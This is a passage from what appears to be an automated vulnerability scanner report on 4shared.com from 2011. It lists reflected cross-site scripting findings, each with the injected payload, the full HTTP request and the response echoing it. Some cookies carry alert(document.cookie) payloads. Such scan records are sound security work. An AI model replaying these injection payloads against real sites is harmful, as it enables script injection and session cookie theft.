1.12. http://search.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63f80"-alert(1)-"11bae875e74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/mainWithoutCommon.css63f80"-alert(1)-"11bae875e74 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/mainWithoutCommon.css63f80"-alert(1)-"11bae875e74
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:03:50 GMT
Content-Length: 36310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css/mainWithoutCommon.css63f80"-alert(1)-"11bae875e74";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.13. http://search.4shared.com/js/utils.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/js/utils.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8b41'-alert(1)-'63f19ac893f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsf8b41'-alert(1)-'63f19ac893f/utils.js HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /jsf8b41'-alert(1)-'63f19ac893f/utils.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:04:16 GMT
Content-Length: 36948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://search.4shared.com/jsf8b41'-alert(1)-'63f19ac893f/utils.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

1.14. http://search.4shared.com/js/utils.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/js/utils.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36042"-alert(1)-"1c581c8364b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js36042"-alert(1)-"1c581c8364b/utils.js HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /js36042"-alert(1)-"1c581c8364b/utils.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:04:09 GMT
Content-Length: 36240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/js36042"-alert(1)-"1c581c8364b/utils.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.15. http://search.4shared.com/js/utils.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/js/utils.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12877'-alert(1)-'eda60036792 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/utils.js12877'-alert(1)-'eda60036792 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /js/utils.js12877'-alert(1)-'eda60036792
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:07:27 GMT
Content-Length: 36251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://search.4shared.com/js/utils.js12877'-alert(1)-'eda60036792',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.16. http://search.4shared.com/js/utils.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/js/utils.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0040"-alert(1)-"c8a96e2acb2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/utils.jsf0040"-alert(1)-"c8a96e2acb2 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /js/utils.jsf0040"-alert(1)-"c8a96e2acb2
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:07:06 GMT
Content-Length: 36251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/js/utils.jsf0040"-alert(1)-"c8a96e2acb2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.17. http://search.4shared.com/search.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.4shared.com
Path:	/search.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ef9a6--><script>alert(1)</script>310e4e7016 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.html?ef9a6--><script>alert(1)</script>310e4e7016=1 HTTP/1.1
Host: search.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: hostid=1214903107; Expires=Sat, 20-Feb-2021 23:05:47 GMT; Path=/
Set-Cookie: search.view2=ls; Domain=.4shared.com; Expires=Thu, 23-Feb-2012 23:05:47 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:05:47 GMT
Connection: close
Content-Length: 97304

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>
...[SNIP]...
<script>alert(1)</script>310e4e7016=1, start=0} -->
...[SNIP]...

1.18. http://static.4shared.com/bundles/css/630963420/css/openid.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/630963420/css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbfcc'-alert(1)-'4c361913f4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundlesdbfcc'-alert(1)-'4c361913f4d/css/630963420/css/openid.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundlesdbfcc'-alert(1)-'4c361913f4d/css/630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D675180400B90C882EFB47AFF974123A.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:34 GMT
Content-Length: 36275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundlesdbfcc'-alert(1)-'4c361913f4d/css/630963420/css/openid.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox
...[SNIP]...

1.19. http://static.4shared.com/bundles/css/630963420/css/openid.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/630963420/css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eba06"-alert(1)-"0dae7da8be1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundleseba06"-alert(1)-"0dae7da8be1/css/630963420/css/openid.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundleseba06"-alert(1)-"0dae7da8be1/css/630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2D6048BB9FB76323C5C3BE99CEBF5256.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:33 GMT
Content-Length: 36275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundleseba06"-alert(1)-"0dae7da8be1/css/630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
functio
...[SNIP]...

1.20. http://static.4shared.com/bundles/css/630963420/css/openid.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/630963420/css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9040'-alert(1)-'3ba2227c6cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/cssd9040'-alert(1)-'3ba2227c6cf/630963420/css/openid.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/cssd9040'-alert(1)-'3ba2227c6cf/630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D4821A5D3DFD7151427DF27EBC325AF1.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:40 GMT
Content-Length: 36264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles/cssd9040'-alert(1)-'3ba2227c6cf/630963420/css/openid.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

1.21. http://static.4shared.com/bundles/css/630963420/css/openid.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/630963420/css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2dac"-alert(1)-"8e22e060db7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/cssc2dac"-alert(1)-"8e22e060db7/630963420/css/openid.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/cssc2dac"-alert(1)-"8e22e060db7/630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FBF240C76EC127DA98FA6F09514E90FB.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:39 GMT
Content-Length: 36264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/cssc2dac"-alert(1)-"8e22e060db7/630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fe
...[SNIP]...

1.22. http://static.4shared.com/bundles/css/677814427/css/upload-frame.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a0ff"-alert(1)-"7efa6baafe1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles7a0ff"-alert(1)-"7efa6baafe1/css/677814427/css/upload-frame.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles7a0ff"-alert(1)-"7efa6baafe1/css/677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C9A0A5D1372DE2F395F2A8F70FB5F31E.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:57 GMT
Content-Length: 36305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles7a0ff"-alert(1)-"7efa6baafe1/css/677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
f
...[SNIP]...

1.23. http://static.4shared.com/bundles/css/677814427/css/upload-frame.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e455b'-alert(1)-'2f6c01d36f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundlese455b'-alert(1)-'2f6c01d36f3/css/677814427/css/upload-frame.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundlese455b'-alert(1)-'2f6c01d36f3/css/677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3358F9F51A8672EDDBE457C2E0B37983.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:58 GMT
Content-Length: 36305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundlese455b'-alert(1)-'2f6c01d36f3/css/677814427/css/upload-frame.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLo
...[SNIP]...

1.24. http://static.4shared.com/bundles/css/677814427/css/upload-frame.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db80d'-alert(1)-'3c4c4c99142 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/cssdb80d'-alert(1)-'3c4c4c99142/677814427/css/upload-frame.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/cssdb80d'-alert(1)-'3c4c4c99142/677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=170182976D33643A196CC3B996F5DFE1.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:04 GMT
Content-Length: 36305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles/cssdb80d'-alert(1)-'3c4c4c99142/677814427/css/upload-frame.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginB
...[SNIP]...

1.25. http://static.4shared.com/bundles/css/677814427/css/upload-frame.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 783a9"-alert(1)-"fe838ec3fce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/css783a9"-alert(1)-"fe838ec3fce/677814427/css/upload-frame.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/css783a9"-alert(1)-"fe838ec3fce/677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=304A6285BAAEAEA780FB81E9E5975246.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:03 GMT
Content-Length: 36305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css783a9"-alert(1)-"fe838ec3fce/677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
funct
...[SNIP]...

1.26. http://static.4shared.com/bundles/css/765844602/css/flags.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/765844602/css/flags.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fa39'-alert(1)-'f8f49bf629e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles4fa39'-alert(1)-'f8f49bf629e/css/765844602/css/flags.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
